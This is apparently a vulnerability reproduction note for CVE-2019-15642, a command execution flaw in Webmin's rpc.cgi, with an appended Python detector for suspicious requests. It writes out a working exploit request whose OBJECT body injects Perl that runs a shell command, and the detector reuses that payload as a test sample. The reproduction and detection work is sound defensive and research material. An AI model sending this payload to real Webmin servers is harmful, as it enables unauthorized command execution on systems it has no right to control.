Webmin rpc.cgi background remote command execution vulnerability CVE-2019-15642
Vulnerability Description
Webmin is a set of Web-based system management tools for Unix-like operating systems. There is a security vulnerability in the rpc.cgi file in Webmin 1.920 and previous versions.
Vulnerability Impact
Webmin < 1.920
Network surveying and mapping
app="webmin"
Vulnerability reproduction
Login page
After logging in, send the following request:
POST /rpc.cgi
Referer: https://xxx.xxx.xxx.xxx/sysinfo.cgi?xnavigation=1
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd=`id`;print "$cmd\n\n";
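An added detection example (not part of the original post and not Webmin code): a Python check that flags captured requests shaped like the one above, that is, a POST to rpc.cgi whose body starts with OBJECT and continues past a bare package name. The host webmin.example, the function names, and the rule that a benign OBJECT value is only a Perl package name are assumptions.

```python
import re

# Assumption: a benign value after "OBJECT" is only a Perl package name.
PACKAGE_ONLY = re.compile(r"[A-Za-z_]\w*(?:::[A-Za-z_]\w*)*\s*\Z")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split()
    method = parts[0].upper() if parts else ""
    path = parts[1].split("?", 1)[0] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_request(raw):
    """Return a finding dict for a suspicious rpc.cgi POST, else None."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or not path.endswith("/rpc.cgi"):
        return None
    match = re.match(r"\s*OBJECT\s+(.*)", body, re.S)
    # Anything after the package name (";", quotes, backticks) is flagged.
    if match is None or PACKAGE_ONLY.match(match.group(1)):
        return None
    return {"path": path, "referer": headers.get("referer", ""),
            "reason": "OBJECT value carries more than a package name"}


# Constructed samples; FLAGGED reuses the request body shown above.
HEAD = ("POST /rpc.cgi HTTP/1.1\r\nHost: webmin.example\r\n"
        "Referer: https://webmin.example/sysinfo.cgi?xnavigation=1\r\n\r\n")
FLAGGED = HEAD + r'OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd=`id`;print "$cmd\n\n";'
PLAIN = HEAD + "OBJECT Socket"
OTHER = "GET /sysinfo.cgi?xnavigation=1 HTTP/1.1\r\nHost: webmin.example\r\n\r\n"

if __name__ == "__main__":
    for name, raw in (("flagged", FLAGGED), ("plain", PLAIN), ("other", OTHER)):
        print(name, inspect_request(raw))
```

The same check can be applied to request bodies recorded by a reverse proxy or WAF in front of Webmin, where POST bodies are available for inspection.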
This post is licensed under CC BY 4.0 by the author.